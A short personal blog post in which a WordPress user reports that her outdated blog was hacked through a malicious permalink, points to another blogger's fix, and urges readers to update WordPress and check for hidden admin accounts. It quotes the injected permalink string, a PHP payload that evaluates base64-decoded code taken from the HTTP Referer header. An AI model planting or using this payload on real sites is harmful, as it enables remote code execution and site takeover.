I got up this morning to find some of my URLs had been appended with: -

/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/

It would appear that the blog has been hacked by someone who registered as a subscriber using black hearted techniques I really don’t understand.  Fortunately for me my knight in shining armour came after a quick Google search  in the form of Andrew Wee who had suffered similar and has written a very thorough fix on his blog.

Read Andrew Wee’s Fix Here >>

Thanks Andrew, this one would have had us stumped.  I’ll be keeping a close eye on all my Wordpress blogs today.

My blog was running on a very old Wordpress version (lazy) so I’m not sure if this is something that’s already been fixed as part of previous version updates or not.  A good reminder that it is important to keep your WP version updated with new fixes!

*edit*

Just found this Wordpress Support Topic on the issue – it does indeed seem to be old versions that have been hacked so guys learn your lesson from this lazy affiliate marketer before it happens to your blog.  Update your Wordpress version now!!!

Also Jason suggested we check our SQL database for any admins that might have been added and sure enough when we checked, there was a spurious admin sitting in there and not visible in Wordpress!

This post is from: Kirsty's Affiliate Marketing Guide - Affiliate Stuff UK

Wordpress Permalink Hack – Old Versions Watch Out!